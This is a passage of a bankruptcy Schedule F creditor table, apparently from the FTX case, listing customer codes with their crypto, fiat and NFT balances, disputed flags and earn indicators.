| 07318819 | | BAT[2], BRZ[2], CUSDT[12], DOGE[4.00009466], ETH[.0069369], ETHW[.0069369], GRT[1], NFT [52428131210966565/Coachella x FTX Weekend 2 #9169][1], TRX[.00001995], USD[0.05], USDT[2] | | |
| 07318822 | | USD[10.00] | | |
| 07318824 | | DOGE[1], TRX[162.51909802], USD[0.00] | | |
| 07318825 | | DOGE[76033.08], SUSHI[250.2], USD[0.28] | | |
| 07318828 | | USD[10.00] | | |
| 07318830 | | BRZ[1], BTC[0], CUSDT[3], DOGE[1], TRX[1], USD[9.27] | | |
| 07318831 | | USD[10.00] | | |
| 07318833 | | BTC[.00007931], ETH[.00012373], ETHW[0.00012372], LTC[.00339], USD[1.00] | | |
| 07318834 | | USD[10.00] | | |
| 07318835 | | ALGO[3.05840705], AVAX[0], GRT[6.06319761], LINK[1.13268373], SHIB[2], TRX[14.13978563], USD[2.37] | | |
| 07318836 | | USD[10.00] | | |
| 07318837 | | BCH[0], DOGE.14405429], USD[0.00], USDT[0.00000001] | | |
| 07318838 | | DOGE[.00007345], GRT[.00014966], USD[44.29] | | |
| 07318839 | | DOGE[.00000001], TRX[1], USD[0.00] | | |
| 07318841 | | USD[10.00] | | |
| 07318842 | | BAT[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07318843 | | USD[10.00] | | |
| 07318847 | | DOGE[.00006819], TRX[2], USD[0.00] | | |
| 07318848 | | CUSDT[3], USD[0.00] | | |
| 07318852 | | DOGE[.00000001], SHIB[1], USD[60.62], USDT[0] | | |
| 07318855 | Contingent, Disputed | BTC[0], DOGE[0], USD[0.06] | | |
| 07318860 | | USD[10.00] | | |
| 07318863 | | USD[0.01] | | |
| 07318865 | | USD[10.00] | | |
| 07318866 | | CUSDT[3], DOGE[1], SUSHI[0], TRX[1], USD[0.00] | | |
| 07318868 | | USD[20.00] | | |
| 07318869 | | USD[10.00] | | |
| 07318871 | | DOGE[1], USD[0.00] | | |
| 07318874 | | BAT[1], BRZ[1], CUSDT[7], DOGE[4196.00254521], ETH[.45063778], ETHW[.45063778], LTC[1.04060117], TRX[1], USD[0.00] | | |
| 07318875 | | USD[10.00] | | |
| 07318882 | | BRZ[1], NFT (338579346417569596/FTX - Off The Grid Miami #2812)[1], SOL[.0000417], USD[0.00] | Yes | |
| 07318883 | | CUSDT[2], DOGE[1], USD[33.92] | Yes | |
| 07318884 | | USD[10.00] | | |
| 07318885 | | DOGE[.543], USD[2.83] | | |
| 07318886 | | DOGE[291.622493], USD[28.04] | | |
| 07318887 | | CUSDT[1], DOGE[0.00001321], ETH[0], USD[0.01] | | |
| 07318889 | | DOGE[22.07938553], USD[0.00] | | |
| 07318890 | | DOGE[1153.36169038], USD[0.00] | | |
| 07318891 | | SUSHI[.69340737], USD[0.00] | | |
| 07318893 | | USD[0.00] | | |
| 07318894 | | DOGE[4.01043091], TRX[1], USD[0.00] | Yes | |
| 07318895 | | DOGE[560.74591434], USD[0.04] | | |
| 07318897 | | USD[10.00] | | |
| 07318898 | | BRZ[3], CUSDT[5], DOGE[461.57312752], LTC[.53141516], SHIB[2169701.70628847], TRX[1], USD[0.02] | Yes | |
| 07318900 | | USD[10.00] | | |
| 07318904 | | BF_POINT[300], BRZ[1], CUSDT[5], GRT[263.90493206], SUSHI[14.79070549], TRX[3], USD[0.00] | Yes | |
| 07318906 | | USD[10.00] | | |
| 07318907 | | BTC[0], DOGE[2769.74721923], ETH[1.17765932], ETHW[1.17765932], USD[21.80], USDT[0] | | |
| 07318909 | | CUSDT[2], DOGE[503.04173352], TRX[2], USD[0.00] | | |
| 07318910 | | ETH[0], USD[0.00] | | |
| 07318911 | | BTC[0], ETH[0], LTC[0], USD[0.00], USDT[0] | | |
| 07318913 | | USD[10.00] | | |
| 07318917 | | USD[0.57] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318921 | | USD[0.11] | | |
| 07318923 | | BRZ[1], CUSDT[1], DOGE[1], NFT (393132317597912831/Entrance Voucher #3347)[1], NFT (477993229667354773/FTX - Off The Grid Miami #1497)[1], SHIB[2], TRX[1], USD[117.53] | Yes | |
| 07318924 | | CUSDT[2], DOGE[.73988662], USD[0.01] | Yes | |
| 07318925 | | NFT (439467630679353363/Desert Rose Ferris Wheel #573)[1], NFT (459718825671318343/Coachella x FTX Weekend 1 #5959)[1], NFT (542847655588249284/Coachella x FTX Weekend 2 #29147)[1] | | |
| 07318926 | | USD[10.00] | | |
| 07318927 | | USD[10.00] | | |
| 07318928 | | USD[10.00] | | |
| 07318929 | | DOGE[528.47475095] | | |
| 07318930 | | ETH[.00169269], ETHW[.00169269], USD[5.00] | | |
| 07318931 | | BTC[0], DOGE[0], ETH[0] | | |
| 07318933 | | BTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07318936 | | TRX[2], USD[0.08] | | |
| 07318939 | | USD[10.00] | | |
| 07318940 | | BRZ[0], DOGE[2], USD[0.10] | | |
| 07318941 | | DOGE[.00096746], USD[0.00] | | |
| 07318942 | | BAT[4.995], BRZ[10], BTC[.0001992], ETH[.002], ETHW[.002], SOL[1.27344237], SUSHI[5.993], USD[1.81], USDT[0.00000001] | | |
| 07318943 | | BTC[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07318944 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07318945 | | CUSDT[6], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07318946 | | DOGE[3032.82], USD[3.25] | | |
| 07318948 | | DOGE[135.484], USD[0.25] | | |
| 07318949 | | USD[10.85] | Yes | |
| 07318950 | | BRZ[5], CUSDT[15], TRX[6], USD[0.00], USDT[4] | | |
| 07318951 | | USD[10.00] | | |
| 07318952 | | DOGE[.50536438], USD[0.12] | | |
| 07318953 | | DOGE[5.88048728], USD[0.00] | | |
| 07318955 | | TRX[2], USD[0.04] | | |
| 07318957 | | BTC[.00006356], DOGE[6028.96584769], USD[0.15] | | |
| 07318960 | | USD[10.00] | | |
| 07318961 | | USD[10.00] | | |
| 07318962 | | USD[10.00] | | |
| 07318963 | | USD[10.00] | | |
| 07318966 | | DOGE[18437.52996098], USD[0.00] | | |
| 07318967 | | USD[10.00] | | |
| 07318968 | | DOGE[0], ETH[.00009899], ETHW[.00009899], USD[0.00] | Yes | |
| 07318969 | | BCH[0.00018635], BTC[0], LTC[.00892], USD[0.62] | | |
| 07318972 | | SHIB[299430], TRX[147.9892], USD[0.05] | | |
| 07318973 | | DOGE[.05431427], USD[0.00] | | |
| 07318975 | | CUSDT[3], DOGE[.00107876], USD[0.13] | | |
| 07318976 | | DOGE[.81342313], USD[0.91] | | |
| 07318977 | | USD[10.94] | Yes | |
| 07318978 | | BRZ[2], BTC[.00089007], CUSDT[7], DOGE[.00004196], ETH[.47296237], ETHW[.47296237], SOL[2.28871115], TRX[4], USD[13.14] | | |
| 07318979 | | BTC[.00000149], CUSDT[9], DOGE[1], LINK[0], TRX[2], USD[0.00], USDT[1.09837872] | Yes | |
| 07318983 | | BRZ[1], BTC[.00016851], CUSDT[1], DOGE[1444.28105576], ETH[.05819476], ETHW[.05819476], USD[0.00] | | |
| 07318985 | | BTC[0], ETH[.00000001], MATIC[.00000001], SOL[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07318986 | | USD[10.00] | | |
| 07318987 | | BRZ[2], CUSDT[20], ETH[.00760818], ETHW[.00751235], TRX[5], USD[0.00] | Yes | |
| 07318988 | | DOGE[274.259], USD[0.75] | | |
| 07318991 | | BRZ[2], BTC[.00297308], CUSDT[2], DOGE[5955.86062376], ETH[.04312628], ETHW[.04259276], KSHIB[1135.09671364], SHIB[1235185.03924499], TRX[1], USD[0.00] | Yes | |
| 07318992 | | DOGE[.6882], SUSHI[.4373], USD[0.05] | | |
| 07318993 | | DOGE[19.60676281], USD[0.00] | | |
| 07318994 | | USD[10.00] | | |
| 07318996 | | USD[10.00] | | |
| 07318997 | | DOGE[163.99554493], GRT[2.56327506], TRX[84.12631734], USD[26.47] | | |
| 07318998 | | USD[10.00] | | |
| 07318999 | | ETH[0], LINK[.00000001], LTC[0], USD[0.00], USDT[0] | Yes | |
| 07319000 | | BRZ[1], DOGE[798.78229221], USD[0.00] | | |
| 07319001 | | BAT[3.20386385], BRZ[9.76509209], CUSDT[26], DOGE[5], GRT[.00046827], LINK[.00001196], SHIB[2], SOL[0.00007168], TRX[8], USD[0.37], USDT[0.00353490] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319003 | | CUSDT[1173.25752767], DOGE[1084.68258337], USD[0.00] | | |
| 07319004 | | USD[10.00], USDT[1] | | |
| 07319005 | | BTC[.0023979], CUSDT[2], DOGE[1664.51140913], ETH[.04148641], ETHW[.04148641], TRX[1], USD[0.00] | | |
| 07319006 | | USD[10.00] | | |
| 07319007 | | USD[10.00] | | |
| 07319008 | | DOGE[.295814] | | |
| 07319010 | | USD[10.00] | | |
| 07319011 | | USD[10.00] | | |
| 07319012 | | USD[0.00], USDT[0] | | |
| 07319013 | | USD[10.00] | | |
| 07319014 | | DOGE[1], SHIB[5427125.86140230], TRX[63.45807413], USD[0.00] | | |
| 07319015 | | BRZ[1], CUSDT[8], TRX[3], USD[0.01] | | |
| 07319019 | | CUSDT[1], DOGE[0], USD[0.01], USDT[0] | | |
| 07319020 | | DOGE[2757.33184479], TRX[2], USD[0.50] | | |
| 07319022 | | SUSHI[84.1726149], USD[3956.84] | Yes | |
| 07319024 | | SHIB[1], USD[121.82], USDT[0] | Yes | |
| 07319025 | | BTC[.00000016], USD[0.00] | | |
| 07319026 | | CUSDT[3], DOGE[91.44963314], SHIB[448273.04884095], USD[0.01] | Yes | |
| 07319030 | | CUSDT[2], DOGE[.00001822], ETH[.0516498], ETHW[.05100637], SHIB[1], TRX[1], USD[0.01], USDT[1.06506055] | Yes | |
| 07319031 | | USD[10.00] | | |
| 07319032 | | USD[10.00] | | |
| 07319033 | | CUSDT[5], TRX[1], USD[0.01] | | |
| 07319035 | | USD[10.00] | | |
| 07319036 | | BRZ[1], CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07319037 | | BRZ[1], CUSDT[4], DOGE[6], TRX[1], USD[0.00] | | |
| 07319043 | | USD[10.00] | | |
| 07319045 | | BRZ[3], CUSDT[6], TRX[6], USD[0.00] | | |
| 07319046 | | BRZ[2], NFT (438989275500595833/Bahrain Ticket Stub #620)[1], NFT (464512789097066184/Barcelona Ticket Stub #659)[1], SHIB[5], SOL[0], TRX[1], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07319047 | | DOGE[.00667637], USD[0.00] | | |
| 07319048 | | DOGE[891.648], USD[70.24] | | |
| 07319050 | | USD[10.00] | | |
| 07319051 | | CUSDT[1], SOL[.21166604], USD[0.00] | | |
| 07319053 | | DOGE[1], USD[0.00] | | |
| 07319054 | | CUSDT[1], DOGE[1015.62784564], USD[0.01] | | |
| 07319059 | | CUSDT[2], USD[0.00] | Yes | |
| 07319060 | | DOGE[0], SOL[0], USD[0.67] | | |
| 07319065 | | USD[10.00] | | |
| 07319066 | | BRZ[0], BTC[0.00778056], CUSDT[0], DOGE[0], ETH[0.06484004], ETHW[0.06403334], SOL[2.38931278], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07319067 | | DOGE[1.0232387], USD[0.02] | | |
| 07319069 | | DOGE[0], TRX[1], USD[10.00] | | |
| 07319070 | | BAT[0], USD[0.01], USDT[0] | Yes | |
| 07319071 | | DOGE[36.95102722], USD[0.00] | Yes | |
| 07319072 | | ETH[.00000001], ETHW[0], USD[0.13], USDT[.00329953] | | |
| 07319074 | | BTC[0.10675083], GRT[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07319075 | | TRX[1], USD[0.01] | | |
| 07319077 | | USD[10.00] | | |
| 07319078 | | CUSDT[3], DOGE[40.3887646], TRX[1.00037535], USD[0.00] | | |
| 07319081 | | USD[10.00] | | |
| 07319083 | | BTC[0], USD[0.00] | | |
| 07319084 | | DOGE[.377], USD[0.47] | | |
| 07319085 | | USD[10.00] | | |
| 07319086 | | DOGE[41.40863872], USD[0.00] | | |
| 07319087 | | DOGE[.1] | | |
| 07319088 | | USD[1.95] | | |
| 07319090 | | BAT[0], BRZ[2], CUSDT[2], DOGE[0], LINK[0], SOL[1.82960215], SUSHI[0], TRX[3], UNI[0], USD[0.00], USDT[0] | | |
| 07319091 | | USD[0.00], USDT[0] | Yes | |
| 07319092 | | USD[10.00] | | |
| 07319094 | | BAT[2.10415921], CUSDT[7], DOGE[1], ETHW[4.74858696], GRT[1.00375375], LINK[1.09283839], SHIB[1], TRX[3], USD[5220.96], USDT[2.18567587] | Yes | |

Schedule F: Creditors Who Have Unsecured Claims (Non-priority Unsecured Claims)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319095 | | USD[10.00] | | |
| 07319098 | | DOGE[30.33777532], USD[0.00] | | |
| 07319099 | | DOGE[0] | | |
| 07319100 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07319101 | | BTC[.00207764], CUSDT[1], USD[10.00] | | |
| 07319102 | | DOGE[1], USD[0.01] | | |
| 07319103 | | DOGE[1], ETH[.00633024], ETHW[.00633024], USD[0.00] | | |
| 07319106 | | CUSDT[2], DOGE[.39054108], TRX[2], USD[0.00] | | |
| 07319107 | | DOGE[0], GRT[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07319108 | | SHIB[1], SOL[0], TRX[1], USD[0.00] | | |
| 07319109 | | DOGE[.932], USD[2.16] | | |
| 07319110 | | DOGE[61.36234217], USD[10.00] | | |
| 07319112 | | DOGE[1], USD[0.01] | | |
| 07319113 | | USD[10.00] | | |
| 07319115 | | USD[10.00] | | |
| 07319116 | | BTC[0], DOGE[0] | | |
| 07319117 | | BAT[2], BRZ[5], BTC[.00000229], DOGE[4], GRT[1], SHIB[1], TRX[6], USD[0.32], USDT[1.02543197] | Yes | |
| 07319118 | | USD[10.00] | | |
| 07319120 | | BRZ[1], DOGE[799.07760866], USD[0.00] | Yes | |
| 07319121 | | BAT[1], DOGE[.02101527], USD[0.00] | | |
| 07319124 | | TRX[2], USD[0.01] | | |
| 07319125 | | BTC[.0002972], CUSDT[2], DOGE[1103.12243755], USD[20.00] | | |
| 07319126 | | USD[10.00] | | |
| 07319127 | | USD[10.00] | | |
| 07319130 | | CUSDT[2], TRX[1], UNI[.00317296], USD[13.41] | | |
| 07319131 | | USD[10.00] | | |
| 07319132 | | BTC[.00079153], CUSDT[1], ETH[0], ETHW[0], USD[83.11], USDT[0] | | |
| 07319134 | | BAT[1.0165555], BRZ[2], BTC[0.00000096], CUSDT[1], DAI[0], DOGE[1], ETH[0], ETHW[0.10433130], LINK[0], SHIB[2], SOL[0], TRX[1], USD[0.02] | Yes | |
| 07319135 | | BRZ[1], DOGE[.40043543], USD[290.16] | | |
| 07319136 | | BTC[0], DOGE[0], SUSHI[0] | | |
| 07319137 | | BTC[.00052251], DOGE[1194.91733526], USD[0.00] | | |
| 07319138 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07319139 | | USD[10.00] | | |
| 07319142 | | USD[10.00] | | |
| 07319143 | | USD[10.00] | | |
| 07319144 | | BAT[1], BTC[0], DOGE[1], USD[0.00] | | |
| 07319146 | | USD[0.01] | | |
| 07319148 | | BRZ[2], GRT[1], SHIB[7], USD[0.00] | Yes | |
| 07319149 | | USD[10.00] | | |
| 07319151 | | BTC[0], CUSDT[21], DOGE[15.81615665], TRX[2], USD[21.00] | | |
| 07319154 | | USD[10.00] | | |
| 07319156 | | BAT[0], BRZ[0], BTC[0], DOGE[0.52796227], ETH[0], LTC[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07319157 | | BAT[1], BTC[0.00000022], DOGE[2], ETHW[.10794198], NFT (503069199700673001/FTX - Off The Grid Miami #2856)[1], SHIB[7], SOL[0.00094238], TRX[3], USD[0.00], USDT[2.18296147] | Yes | |
| 07319158 | | USD[10.00] | | |
| 07319160 | | BTC[0], CUSDT[2], DOGE[1], ETH[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07319162 | | USD[10.00] | | |
| 07319163 | | DOGE[1915.72715], USD[298.12] | | |
| 07319165 | | USD[10.00] | | |
| 07319169 | | USD[10.00] | | |
| 07319171 | | AAVE[0], BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0.00000001], LINK[0], MATIC[0], NEAR[0], SHIB[14445.09290901], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07319172 | | CUSDT[2], SHIB[0], USD[0.01] | Yes | |
| 07319173 | | USD[10.00] | | |
| 07319174 | | USD[10.00] | | |
| 07319176 | | BTC[0], CUSDT[12], DOGE[183.40011989], ETH[0], TRX[3.00004746], USD[0.00] | Yes | |
| 07319177 | Contingent, Disputed | USD[0.51], USDT[0] | Yes | |
| 07319180 | | BAT[1], BRZ[1], CUSDT[7], DOGE[16689.17567537], ETH[.52841486], ETHW[.52819298], LINK[44.78016236], TRX[2], USD[0.00], USDT[1.05054141] | Yes | |
| 07319181 | | DOGE[12545.83867224], SHIB[3097055], SOL[1.9981], USD[308.79] | | |
| 07319182 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319183 | | USD[0.00] | | |
| 07319184 | | AAVE[5.14377089], AVAX[56.96426227], BAT[486.31023311], BCH[12.76309852], BRZ[2], CUSDT[5], DOGE[6491.85883218], ETH[6.79982534], ETHW[6.79796633], LINK[21.88002046], LTC[64.47361999], MATIC[1704.79089054], SOL[94.37187443], SUSHI[9.50052641], TRX[2], UNI[132.04568932], USD[0.00], USDT[171.13501876] | Yes | |
| 07319185 | | USD[0.00] | | |
| 07319186 | | USD[10.00] | | |
| 07319187 | | BAT[1.01190779], BRZ[2], CUSDT[1], NFT (38448204919738O289/Warriors 75th Anniversary Icon Edition Diamond #1058)[1], SOL[0], TRX[2], USD[0.00], USDT[1.09435778] | Yes | |
| 07319190 | | USD[10.00] | | |
| 07319195 | | USD[10.00] | | |
| 07319196 | | DOGE[1], GRT[1], USD[0.00], USDT[0] | | |
| 07319197 | | BAT[1], CUSDT[2], TRX[3], USD[0.00], USDT[2] | | |
| 07319198 | | CUSDT[4], NFT (369189242127787029/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #122)[1], SHIB[7878982.03875095], TRX[1831.90987025], USD[0.00] | Yes | |
| 07319199 | | CUSDT[1], DOGE[61.99174638], USD[0.00] | | |
| 07319200 | | USD[0.00] | Yes | |
| 07319201 | | USD[0.01] | Yes | |
| 07319202 | | USD[4.92] | | |
| 07319208 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07319209 | | BRZ[1], BTC[0], CUSDT[13], DOGE[0], GRT[0], LINK[0.00001632], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07319210 | | BTC[0.00025970], DOGE[0], ETH[0], USD[2.16] | | |
| 07319211 | | USD[10.00] | | |
| 07319214 | | BTC[.00000001], DOGE[1], GRT[5.59769026], USD[0.00] | Yes | |
| 07319215 | | USD[0.00] | | |
| 07319216 | | BAT[1], BRZ[1], CUSDT[10], GRT[2], SUSHI[.26370927], TRX[1], USD[0.01] | | |
| 07319217 | | CUSDT[5], DOGE[0], ETH[0], SUSHI[0], TRX[3], USD[0.00] | | |
| 07319219 | | USD[10.00] | | |
| 07319224 | | USD[0.01] | Yes | |
| 07319226 | | USD[10.00] | | |
| 07319228 | | BRZ[1], DOGE[1.2250797], USD[0.07] | | |
| 07319229 | Contingent, Disputed | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07319231 | | BRZ[2], CUSDT[11], DOGE[3.71325739], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07319232 | | USD[10.00] | | |
| 07319233 | | DOGE[.402], USD[0.01] | | |
| 07319235 | | CUSDT[1], DOGE[.00003307], USD[0.00] | | |
| 07319236 | | USD[0.01], USDT[0] | | |
| 07319237 | | CUSDT[9], DOGE[1], TRX[4], USD[0.00] | | |
| 07319238 | | USD[10.00] | | |
| 07319239 | | CUSDT[5], DOGE[.0000152], TRX[2], USD[0.00] | | |
| 07319240 | | BRZ[3], CUSDT[2], DOGE[0], TRX[2], USD[0.00], USDT[0] | | |
| 07319241 | | USD[10.00] | | |
| 07319242 | | BAT[1], BCH[.3022064], BRZ[1], CUSDT[3], DOGE[2], ETH[.16338532], ETHW[.16338532], SUSHI[5.53919615], TRX[1], USD[0.01] | | |
| 07319244 | | BAT[53.03291832], CUSDT[9], DOGE[396.83893757], GRT[37.01633938], KSHIB[192.71431952], SOL[1.20629479], TRX[3], USD[0.00] | Yes | |
| 07319247 | | BRZ[4], BTC[.00000035], LINK[.00000854], SHIB[5], SUSHI[.00058033], USD[0.00] | Yes | |
| 07319249 | | BTC[.00021404], DOGE[143.74452034], USD[23.59] | | |
| 07319250 | | USD[10.00] | | |
| 07319251 | | USD[0.01] | | |
| 07319252 | | USD[10.00] | | |
| 07319254 | | DOGE[0], LINK[0], USD[0.69] | | |
| 07319255 | | CUSDT[1], USD[53.58] | | |
| 07319257 | | USD[10.00] | | |
| 07319261 | | USD[10.00] | | |
| 07319263 | | USD[360.00] | | |
| 07319264 | | BTC[.00019153], USD[0.00] | | |
| 07319265 | | USD[10.00] | | |
| 07319266 | | CUSDT[3], LTC[.16996844], USD[0.00] | | |
| 07319267 | | BRZ[1], CUSDT[3], DAI[170.37699002], DOGE[14111.04998431], ETH[.00008044], ETHW[0.00008043], GRT[241.05337283], SUSHI[1], TRX[15090.03966863], USD[0.00], USDT[1] | | |
| 07319268 | | USD[0.01] | | |
| 07319269 | | USD[0.00] | Yes | |
| 07319272 | | USD[10.00] | | |
| 07319274 | | USD[10.00] | | |
| 07319276 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319278 | | BTC[0.00067633], CUSDT[1], DOGE[2], TRX[.00028534], USD[10.00] | | |
| 07319279 | | CUSDT[2], DOGE[23829.48512493], TRX[1], USD[0.00] | Yes | |
| 07319280 | | USD[15.00] | | |
| 07319281 | | DOGE[.708], USD[0.53] | | |
| 07319283 | | USD[0.00] | | |
| 07319286 | | USD[50.00] | | |
| 07319287 | | DOGE[1], USD[0.00] | | |
| 07319288 | | BTC[.00000354], USD[0.00] | | |
| 07319289 | | BRZ[1], CUSDT[2], USD[0.01] | | |
| 07319290 | | USD[10.00] | | |
| 07319291 | | DAI[0], DOGE[7.992], EUR[0.00], LINK[0], SUSHI[4.49550000], USD[0.15] | | |
| 07319292 | | BTC[0], USDT[0.00054686] | | |
| 07319295 | | USD[10.00] | | |
| 07319297 | | CUSDT[3], DOGE[.70269969], USD[0.19] | | |
| 07319298 | | USD[1.01] | | |
| 07319301 | | BTC[0], CUSDT[6], DOGE[68.79514345], TRX[1], USD[0.00] | | |
| 07319303 | | USD[10.00] | | |
| 07319304 | | DOGE[0], ETH[0], SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07319307 | | USD[10.00] | | |
| 07319309 | | CUSDT[2], DOGE[11365.62440144], ETH[.3058088], ETHW[.3058088], TRX[136.70426352], USD[7.00] | | |
| 07319310 | | USD[10.00] | | |
| 07319311 | | BAT[1], BRZ[1], TRX[1], USD[0.00] | | |
| 07319314 | | USD[1.47] | Yes | |
| 07319317 | | USD[10.13] | | |
| 07319318 | | USD[10.00] | | |
| 07319319 | | DOGE[2], ETH[.0466007], ETHW[.0466007], USD[0.00] | | |
| 07319320 | | DOGE[1.00002602], ETH[0.02676106], ETHW[0.02676106], USD[0.00] | | |
| 07319321 | | MATIC[8.93140675], USD[0.00] | | |
| 07319322 | | BTC[.02500337], DOGE[0], ETH[.00001034], ETHW[.00000887], SHIB[132], SUSHI[0.00011433], USD[0.00], USDT[0] | Yes | |
| 07319325 | | USD[11.01] | Yes | |
| 07319327 | | BRZ[1], CUSDT[1], DOGE[5], TRX[1], USD[0.00], USDT[0] | | |
| 07319328 | | USD[10.00] | | |
| 07319331 | | USD[0.91] | | |
| 07319332 | | CUSDT[5], SUSHI[0.00019951], TRX[5], USD[0.00] | Yes | |
| 07319333 | | USD[10.13] | | |
| 07319339 | | USD[38.77] | | |
| 07319340 | | BRZ[0], BTC[0], DOGE[4.05213569], ETH[0.04169113], ETHW[0.04117129], LTC[0], SHIB[1994420.73072904], SOL[0.15523464], SUSHI[0], TRX[2], UNI[0], USD[0.00] | Yes | |
| 07319341 | | USD[210.00] | | |
| 07319345 | | BTC[0], DOGE[3804.50253042], TRX[3000.53495332] | | |
| 07319346 | | DOGE[371.16000000], USD[0.00] | | |
| 07319347 | | CUSDT[1], DOGE[5.14305796], TRX[1], USD[0.00] | Yes | |
| 07319349 | | USD[10.00] | | |
| 07319350 | | USD[0.00] | | |
| 07319351 | | DOGE[2.64859944], USD[0.00] | | |
| 07319352 | | DOGE[1], TRX[1], USD[5.92] | Yes | |
| 07319354 | | USD[10.00] | | |
| 07319355 | | USD[0.00] | | |
| 07319357 | | BTC[0], DOGE[0], ETH[0], LTC[0], SUSHI[0], TRX[0] | | |
| 07319358 | | USD[10.00] | | |
| 07319359 | | ETH[0.01366581], ETHW[0.01366581], USD[0.00] | | |
| 07319360 | | USD[10.00] | | |
| 07319361 | | BTC[0], DOGE[0], UNI[0] | | |
| 07319363 | | BAT[2], CUSDT[5], DOGE[0], GRT[1], SOL[0], SUSHI[0], TRX[3], USD[0.00], USDT[1] | | |
| 07319364 | | USD[10.00] | | |
| 07319365 | | USD[10.00] | | |
| 07319366 | | BTC[0], DOGE[0], ETHW[.000995], USD[0.00], USDT[0] | | |
| 07319367 | | DOGE[1.62643606], USD[0.00] | | |
| 07319368 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07319371 | | BRZ[1], CUSDT[1], SHIB[1], TRX[2], USD[404.23] | | |
| 07319375 | | USD[0.19] | | |
| 07319376 | | BAT[1], BRZ[3], CUSDT[18], DOGE[6], TRX[2], USD[0.00], USDT[0] | | |
| 07319377 | | USD[10.00] | | |
| 07319378 | | BTC[0], CUSDT[7], DOGE[24.57476595], TRX[1], USD[0.00], USDT[0] | | |
| 07319380 | | BAT[1], BRZ[1], BTC[.00000065], CUSDT[6], SHIB[1], SOL[.38094721], TRX[2], USD[1477.87], USDT[1.08727834] | Yes | |
| 07319381 | | USDT[0.00000001] | | |
| 07319383 | | BTC[.01414322], DOGE[461.25250641] | | |
| 07319384 | | DOGE[1], USD[0.00] | Yes | |
| 07319385 | | BTC[0], DOGE[0.28879748], USD[0.01] | | |
| 07319388 | | USD[10.00] | | |
| 07319389 | | BCH[.00019184], CUSDT[3], ETH[.01400556], ETHW[.01400556], GRT[3.88719049], USD[0.00] | | |
| 07319390 | | DOGE[28.85257465], USD[0.00] | | |
| 07319395 | | USD[10.00] | | |
| 07319397 | | USD[10.00] | | |
| 07319400 | | DOGE[269], LINK[0], USD[0.00], USDT[0.00030115], YFI[0] | | |
| 07319401 | | USD[10.00] | | |
| 07319403 | | BRZ[1], CUSDT[2], DOGE[5.36068233], SHIB[1], TRX[2], USD[0.29] | | |
| 07319405 | | BAT[0], BCH[0], BRZ[1], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07319406 | | CUSDT[1], LTC[.03344729], SOL[.1210168], USD[4.80] | | |
| 07319407 | Contingent, Disputed | USD[0.00] | | |
| 07319410 | | BAT[8.18421502], CUSDT[1], DOGE[1.01808006], GRT[.05742223], SHIB[16010.49401347], SOL[3.63363253], TRX[77.81634702], USD[0.00] | | |
| 07319411 | | USD[10.00] | | |
| 07319412 | | USD[10.00] | | |
| 07319414 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0.00118831], SOL[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07319415 | | BRZ[4], CUSDT[12], DOGE[1], TRX[6], USD[0.01] | | |
| 07319416 | | DOGE[0], SHIB[0], USD[0.00], USDT[0] | Yes | |
| 07319418 | | USD[10.00] | | |
| 07319419 | | BRZ[1], BTC[.01144394], DOGE[1], ETH[.1666994], ETHW[.16634524], LINK[.40157516], TRX[1], USD[0.00] | Yes | |
| 07319420 | | USD[0.00] | Yes | |
| 07319421 | | DOGE[8501856], ETH[.0004502], ETHW[0.00004501], TRX[301.168], USD[0.40] | | |
| 07319423 | | DOGE[12590.10410521], USD[0.00] | | |
| 07319426 | | CUSDT[1], DOGE[.04377357], USD[0.01] | | |
| 07319427 | | USD[10.00] | | |
| 07319428 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07319429 | | USD[10.00] | | |
